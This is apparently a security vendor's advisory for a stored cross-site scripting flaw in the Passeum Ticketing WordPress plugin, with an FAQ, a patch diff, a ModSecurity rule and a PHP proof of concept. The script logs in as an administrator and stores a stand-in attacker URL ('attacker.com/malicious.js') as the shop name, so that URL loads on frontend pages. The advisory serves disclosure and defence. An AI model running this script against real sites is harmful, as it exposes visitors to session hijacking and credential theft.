What is CVE-2026-7421?

CVE-2026-7421 is a stored cross-site scripting (XSS) vulnerability in the Passeum Ticketing plugin for WordPress, affecting versions up to and including 1.0. It allows authenticated attackers with Administrator-level access to inject arbitrary scripts via the ‘shop_name’ setting.

How does the vulnerability work?

The vulnerability occurs because the plugin does not properly sanitize the ‘shop_name’ setting when it starts with ‘http’. This allows an attacker to set a malicious URL that gets executed on frontend pages containing Passeum Ticketing shortcodes.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify if you are using the Passeum Ticketing plugin version 1.0 or earlier. Additionally, review the settings for the ‘shop_name’ to see if it has been set to an external URL.

What is the severity level of this vulnerability?

The CVSS score for CVE-2026-7421 is 4.4, indicating a medium severity level. This means while it is not the highest risk, it can still lead to significant issues such as session hijacking and credential theft if exploited.

How can I fix this vulnerability?

To fix this vulnerability, update the Passeum Ticketing plugin to version 1.0.1 or later. This version includes patches that sanitize the ‘shop_name’ input and prevent the injection of external scripts.

What mitigation strategies can I implement?

In addition to updating the plugin, consider restricting Administrator access to trusted users only and regularly auditing plugin settings. Implementing a web application firewall (WAF) can also help mitigate potential exploits.

What does the proof of concept demonstrate?

The proof of concept illustrates how an authenticated attacker can log in as an administrator, set the ‘shop_name’ to a malicious URL, and subsequently inject scripts that execute on the frontend of the site, affecting all visitors.

What are the potential impacts of this vulnerability?

Successful exploitation can lead to arbitrary JavaScript execution on affected pages, resulting in session hijacking, credential theft, site defacement, or redirection to malicious sites, impacting all site visitors.

Is there a way to test for this vulnerability safely?

You can test for this vulnerability in a controlled environment by setting up a test site with the vulnerable plugin version. Use the proof of concept code to simulate an attack, ensuring you have permission to test the site.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Passeum Ticketing plugin until a patch can be applied. Additionally, review user permissions and limit access to the plugin settings.

How does this vulnerability relate to the broader security landscape?

Stored XSS vulnerabilities are common in web applications and can have severe consequences. Understanding and mitigating such vulnerabilities is critical for maintaining the security and integrity of web applications.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 2, 2026

CVE-2026-7421: Passeum Ticketing <= 1.0 Authenticated (Administrator+) Stored Cross-Site Scripting via 'shop_name' Setting PoC, Patch Analysis & Rule

Q: Who is affected by this vulnerability?

WordPress sites using the Passeum Ticketing plugin version 1.0 or earlier are affected, particularly in multisite installations where administrators may not have the unfiltered_html capability. Single-site installations are less impacted due to inherent capabilities.

CVE ID CVE-2026-7421

Plugin passeum-ticketing

Severity Medium (CVSS 4.4)

CWE 79

Vulnerable Version 1.0

Patched Version 1.0.1

Disclosed June 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-7421:
This vulnerability allows authenticated attackers with Administrator-level access to perform stored cross-site scripting (XSS) attacks via the ‘shop_name’ setting in the Passeum Ticketing plugin for WordPress (versions up to and including 1.0). The plugin improperly handles the ‘shop_name’ input by executing it as a URL when it begins with “http”, allowing injection of external JavaScript and CSS files that execute on every frontend page containing a Passeum Ticketing shortcode. The CVSS score is 4.4 (medium severity).

Root Cause:
The vulnerability stems from two failures in the plugin’s code. First, the validate_shop_name() function in /passeum-ticketing/inc/settings.php (lines 143-157 of the vulnerable version) only checks if the input is empty or not a string; it does not sanitize or restrict the value. Second, the get_shop_url() function in /passeum-ticketing/passeum-ticketing.php (line 204) returns the raw ‘shop_name’ value unmodified if it starts with ‘http’. This value is then passed directly to wp_register_script() and wp_register_style(), which enqueue arbitrary external resources from the attacker-controlled domain.

Exploitation:
An authenticated administrator navigates to the plugin settings page (typically /wp-admin/options-general.php?page=passeum-ticketing). The attacker sets the ‘shop_name’ parameter to an attacker-controlled URL, for example: https://attacker.com/malicious.js. The plugin stores this value without sanitization. On every subsequent frontend page load that includes any Passeum Ticketing shortcode, the plugin registers and enqueues the attacker’s external script and stylesheet, executing arbitrary JavaScript in the context of the victim’s browser. All site visitors are affected.

Patch Analysis:
The patch modifies two files. In /passeum-ticketing/inc/settings.php, the validate_shop_name() function now uses a regular expression: ‘/^[a-zA-Z0-9_-]+$/’ to restrict the ‘shop_name’ to alphanumeric characters, underscores, and hyphens only. This prevents URL strings from being accepted. In /passeum-ticketing/passeum-ticketing.php, the get_shop_url() function always prepends ‘https://’ and the shop name to the fixed domain ‘.jegyek.passeum.com’, never returning an arbitrary user-supplied URL. This eliminates the XSS vector.

Impact:
Successful exploitation allows an attacker to inject arbitrary JavaScript and CSS into every page of the WordPress site that uses any Passeum Ticketing shortcode. This can lead to session hijacking, credential theft, defacement, redirection to malicious sites, and other client-side attacks affecting all site visitors. Note that on single-site installations, administrators already have the unfiltered_html capability, so this vulnerability primarily impacts multisite installations where administrators may not have that capability.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/passeum-ticketing/inc/settings.php
+++ b/passeum-ticketing/inc/settings.php
@@ -140,24 +140,15 @@
         }

         private function validate_shop_name( $data ): string {
-            if ( empty( $data ) ) {
+            if ( empty( $data ) || ! preg_match( '/^[a-zA-Z0-9_-]+$/', $data ) ) {
                 add_settings_error(
                     'passeum_ticketing_widget_options',
                     'passeum_ticketing_widget_options',
-                    'A boltod neve mező nem lehet üres.',
+                    'A "bolt neve" mező érvénytelen. Csak alfanumerikus karaktereket, alulvonást és kötőjelet tartalmazhat.',
                     'error'
                 );
+                return '';
             }
-
-            if ( !is_string( $data ) ) {
-                add_settings_error(
-                    'passeum_ticketing_widget_options',
-                    'passeum_ticketing_widget_options',
-                    'A boltod neve mező érvénytelen.',
-                    'error'
-                );
-            }
-
             return $data;
         }

--- a/passeum-ticketing/passeum-ticketing.php
+++ b/passeum-ticketing/passeum-ticketing.php
@@ -2,8 +2,8 @@

 /*
 Plugin Name: Passeum Ticketing
-Description: Embedding the Passeum Ticketing ticket purchase widget into your own WordPress website.
-Version: 1.0
+Description: Jegyvásárlás widget beillesztése saját weboldaladra
+Version: 1.0.1
 License: GPLv2 or later
 */

@@ -201,9 +201,7 @@
         }

         private function get_shop_url( string $shop_name ): string {
-            return 0 === strpos( $shop_name, 'http' )
-                ? $shop_name
-                : 'https://' . esc_attr( $shop_name ) . '.jegyek.passeum.com';
+            return 'https://' . esc_attr( $shop_name ) . '.jegyek.passeum.com';
         }
     }
 }

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@streq /wp-admin/options.php" "id:20260001,phase:2,deny,status:403,chain,msg:'CVE-2026-7421 - Passeum Ticketing Stored XSS via shop_name setting',severity:'CRITICAL',tag:'CVE-2026-7421',tag:'WordPress',tag:'Passeum Ticketing'"
SecRule ARGS_POST:option_page "@streq passeum_ticketing_widget_options" "chain"
SecRule ARGS_POST:passeum_ticketing_widget_options[] "@rx ^https?://" "chain"
SecRule ARGS_POST:action "@streq update" ""

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-7421 - Passeum Ticketing <= 1.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'shop_name' Setting

// Configuration
$target_url = 'http://example.com'; // Change to target WordPress site
$admin_username = 'admin'; // Change to admin username
$admin_password = 'password'; // Change to admin password
$malicious_url = 'https://attacker.com/malicious.js'; // Attacker-controlled URL

// Step 1: Login as administrator
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . urlencode($admin_username) . '&pwd=' . urlencode($admin_password) . '&wp-submit=Log+In&redirect_to=' . urlencode($target_url . '/wp-admin/') . '&testcookie=1');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_exec($ch);

// Step 2: Fetch the plugin settings page to get the nonce
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/options-general.php?page=passeum-ticketing');
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$response = curl_exec($ch);

// Extract nonce (assuming WordPress settings API uses _wpnonce)
preg_match('/name="_wpnonce" value="([^"]+)"/', $response, $matches);
if (!isset($matches[1])) {
    echo "Failed to retrieve nonce. Exiting.n";
    exit(1);
}
$nonce = $matches[1];

// Step 3: Update the shop_name setting to the malicious URL
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/options.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'option_page=passeum_ticketing_widget_options&action=update&_wpnonce=' . urlencode($nonce) . '&_wp_http_referer=' . urlencode($target_url . '/wp-admin/options-general.php?page=passeum-ticketing') . '&passeum_ticketing_widget_options%5Bshop_name%5D=' . urlencode($malicious_url));
$response = curl_exec($ch);

if (strpos($response, 'Settings saved') !== false) {
    echo "[+] shop_name successfully set to $malicious_urln";
    echo "[+] Exploit payload stored. Any frontend page with a Passeum Ticketing shortcode will now load external JavaScript from the attacker's domain.n";
} else {
    echo "[-] Failed to update settings. Check credentials or plugin configuration.n";
}

curl_close($ch);

Frequently Asked Questions

What is CVE-2026-7421?
Overview of the vulnerability
CVE-2026-7421 is a stored cross-site scripting (XSS) vulnerability in the Passeum Ticketing plugin for WordPress, affecting versions up to and including 1.0. It allows authenticated attackers with Administrator-level access to inject arbitrary scripts via the ‘shop_name’ setting.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability occurs because the plugin does not properly sanitize the ‘shop_name’ setting when it starts with ‘http’. This allows an attacker to set a malicious URL that gets executed on frontend pages containing Passeum Ticketing shortcodes.
Who is affected by this vulnerability?
Identifying impacted users
WordPress sites using the Passeum Ticketing plugin version 1.0 or earlier are affected, particularly in multisite installations where administrators may not have the unfiltered_html capability. Single-site installations are less impacted due to inherent capabilities.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify if you are using the Passeum Ticketing plugin version 1.0 or earlier. Additionally, review the settings for the ‘shop_name’ to see if it has been set to an external URL.
What is the severity level of this vulnerability?
Understanding the CVSS score
The CVSS score for CVE-2026-7421 is 4.4, indicating a medium severity level. This means while it is not the highest risk, it can still lead to significant issues such as session hijacking and credential theft if exploited.
How can I fix this vulnerability?
Applying the necessary patch
To fix this vulnerability, update the Passeum Ticketing plugin to version 1.0.1 or later. This version includes patches that sanitize the ‘shop_name’ input and prevent the injection of external scripts.
What mitigation strategies can I implement?
Preventative measures
In addition to updating the plugin, consider restricting Administrator access to trusted users only and regularly auditing plugin settings. Implementing a web application firewall (WAF) can also help mitigate potential exploits.
What does the proof of concept demonstrate?
Understanding the exploit process
The proof of concept illustrates how an authenticated attacker can log in as an administrator, set the ‘shop_name’ to a malicious URL, and subsequently inject scripts that execute on the frontend of the site, affecting all visitors.
What are the potential impacts of this vulnerability?
Consequences of exploitation
Successful exploitation can lead to arbitrary JavaScript execution on affected pages, resulting in session hijacking, credential theft, site defacement, or redirection to malicious sites, impacting all site visitors.
Is there a way to test for this vulnerability safely?
Conducting security assessments
You can test for this vulnerability in a controlled environment by setting up a test site with the vulnerable plugin version. Use the proof of concept code to simulate an attack, ensuring you have permission to test the site.
What should I do if I cannot update the plugin immediately?
Temporary measures
If immediate updating is not possible, consider disabling the Passeum Ticketing plugin until a patch can be applied. Additionally, review user permissions and limit access to the plugin settings.
How does this vulnerability relate to the broader security landscape?
Context of stored XSS vulnerabilities
Stored XSS vulnerabilities are common in web applications and can have severe consequences. Understanding and mitigating such vulnerabilities is critical for maintaining the security and integrity of web applications.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations